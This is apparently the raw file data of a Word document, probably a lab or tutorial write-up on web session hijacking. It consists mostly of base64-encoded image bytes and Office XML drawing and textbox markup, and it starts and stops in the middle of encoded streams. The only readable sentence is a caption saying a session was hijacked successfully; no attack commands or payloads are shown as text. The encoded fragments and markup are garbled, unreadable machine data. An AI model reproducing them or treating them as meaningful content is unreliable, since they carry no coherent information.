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&#10;jyPQWar/02f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BZT/8&#10;HgQAAMANAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQB0&#10;n5ixCzwBAAs8AQAUAAAAAAAAAAAAAAAAAIcGAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ1BLAQItABQA&#10;BgAIAAAAIQB/HCbi3QAAAAUBAAAPAAAAAAAAAAAAAAAAAMRCAQBkcnMvZG93bnJldi54bWxQSwEC&#10;LQAUAAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAAAAAAAADOQwEAZHJzL19yZWxzL2Uyb0Rv&#10;Yy54bWwucmVsc1BLBQYAAAAABgAGAHwBAAC/RAEAAAA=&#10;">
                <v:rect id="Rectangle 3273" o:spid="_x0000_s1259" style="position:absolute;left:59448;top:32362;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4C7D8442" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3274" o:spid="_x0000_s1260" style="position:absolute;top:34008;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09FB93E4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3275" o:spid="_x0000_s1261" style="position:absolute;top:36035;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2FEF89B3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3283" o:spid="_x0000_s1262"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i7xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9ba8JA&#10;EIXfC/6HZQTf6kYDRVJXkYKtCoUa7fuQHZPQ7GzMbm7/vlso+Hg4l4+z3g6mEh01rrSsYDGPQBBn&#10;VpecK7he9s8rEM4ja6wsk4KRHGw3k6c1Jtr2fKYu9bkII+wSVFB4XydSuqwgg25ua+Lg3Wxj0AfZ&#10;5FI32IdxU8llFL1IgyUHQoE1vRWU/aStCZBhd0sx/T52n+fTYpQtvn993JWaTYfdKwhPg3+E/9sH&#10;rSBermL4exOegNz8AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAi7eLvEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                  <v:imagedata r:id="rId82" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3284" o:spid="_x0000_s1263"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ivxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvwv6H8IS9aWoVKV2jyOouHrUKsrdH82yLzUtpsrb+eyMIHoeZ+YZZrHpTixu1rrKsYDKOQBDn&#10;VldcKDgdf0YJCOeRNdaWScGdHKyWH4MFptp2fKBb5gsRIOxSVFB636RSurwkg25sG+LgXWxr0AfZ&#10;FlK32AW4qWUcRXNpsOKwUGJD3yXl1+zfKNh28dn/7X+vyeRidTMrNjzdH5X6HPbrLxCeev8Ov9o7&#10;rWAaJzN4vglPQC4fAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAk6CK/EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6D9BA5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F8D3CC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE1FE31" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E189C6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126F4108" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="219465C9" wp14:editId="551183B8">
                <wp:extent cx="5986882" cy="3752871"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41403" name="Group 41403"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986882" cy="3752871"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986882" cy="3752871"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="3351" name="Rectangle 3351"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3236387"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0A0D14B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352" name="Rectangle 3352"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3400979"/>
                            <a:ext cx="4617527" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="76C9377A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>As you can see the session got hijacked successfully</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3353" name="Rectangle 3353"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3475304" y="3400979"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="730A9157"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354" name="Rectangle 3354"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3603671"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1EA967E2"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373" name="Picture 3373"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId83"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3374" name="Shape 3374"/>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9465C9" id="Group 41403" o:spid="_x0000_s1264" style="width:471.4pt;height:295.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59868,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kyRGRwQAAJcPAAAOAAAAZHJzL2Uyb0RvYy54bWzkV21v2zYQ/j5g&#10;/0HQ98Z6sWxZiFMMzRoUGNag7X4ATVGWMIokSPptv353JCU7sbukKdAMaIDIFHk83j13p3t4/Xbf&#10;82jLtOmkWMbpVRJHTFBZd2K9jP/68v5NGUfGElETLgVbxgdm4rc3v/5yvVMVy2Qrec10BEqEqXZq&#10;GbfWqmoyMbRlPTFXUjEBi43UPbHwqteTWpMdaO/5JEuS2WQnda20pMwYmL31i/GN0980jNqPTWOY&#10;jfgyBtuse2r3XOFzcnNNqrUmqu1oMIO8wIqedAIOHVXdEkuije7OVPUd1dLIxl5R2U9k03SUOR/A&#10;mzR55M2dlhvlfFlXu7UaYQJoH+H0YrX0z+2dVp/VvQYkdmoNWLg39GXf6B5/wcpo7yA7jJCxvY0o&#10;TBaLclaWWRxRWMvnRVbOUw8qbQH5s320/f2JnZPh4MkDc3YKEsQcMTDfh8HnlijmoDUVYHCvo64G&#10;B/IijSNBesjUT5A7RKw5i9ysg8fJjmCZygBuF5AqFtNpmUG6ISZZPsvLucdkRA0kco9Zuiin+QyX&#10;R8dJpbSxd0z2EQ6WsQZTXHaR7R/GetFBBI/nAp9Cvu8496s4A/gNFuLI7ld752SaZngczq1kfQDX&#10;W6n/+QhF3HC5W8YyjGKsazgdV+OIfxAAOZbQMNDDYDUMtOXvpCs0b89vGyubzhl8PC0YBrH0NvyI&#10;oEJ+XgjqCAMkwNNBDeGcJslivngYzukshcyfv15A858toFA8FwI6wvCsgObTeZEnU1+ll8JaFEUO&#10;7Qu/bK9RpdOfLagQigtBHWF4VlBDlc6SfDY0ouNH91XDWfxfwqk6WsF/YBMwOuukT7Mu2GU3msVB&#10;Sf8sHT3Rf2/UGyA+ithu1fHOHhyJg96GRontfUexoeLLaVOej+UOAngutGSYgyY2SOI+7Hz4/kDN&#10;incK2yI2JBwHg4EBPmJQF3z27OxW0k3PhPV0UzMOtkth2k6ZONIV61cMmIP+UAfeY6xmlrZ4YAMH&#10;I43wPXlccFYeDUObv0Ik8jJPwHf8AGXzJLDVMZ/LORAuSHhHvUBwkbgceymPcGZ5Q9wQ7PphHXo+&#10;1r4jZhjfb6v7rICSd0idobRYpEeUskV+hhLdeLaFIRsYFjD52nMtmGuHEd2LYYic7D8vFZDjuA+V&#10;4jACZlWUwZYWqaY3Bdd7oFxfpJO0R8Y8SPjsOcpwcSo76kSuGXT6HYPc8Kuc7lN5BxWkyyAx/HpJ&#10;/yl9LEO5NMwfgG452jq6CrpOweQCvc4KaK6QpQSudw1Uj2OycLMR9WDnGVc19sAZ4sHFJ9YAa4Wb&#10;Rur2Gb1eveM62hLkme4PvwPOCRDFPb7qwq7kq7tQlHDVkqArqAkHOJVBE0oyd5ccjQlqabDGXyjh&#10;WgZ+DtdKMGnc5MySwo77BVyG3YGOo3tvjxQZHcI3x5HdNQhuf86icFPF6+Xpu5M/3qdv/gUAAP//&#10;AwBQSwMECgAAAAAAAAAhAO9nTJlKGAEAShgBABQAAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ//Y/+AA&#10;EEpGSUYAAQEBAGAAYAAA/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4S&#10;EA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgCHgP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Bfgrwda/D&#10;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&#10;N5I3kkdIxH0/ef33k/K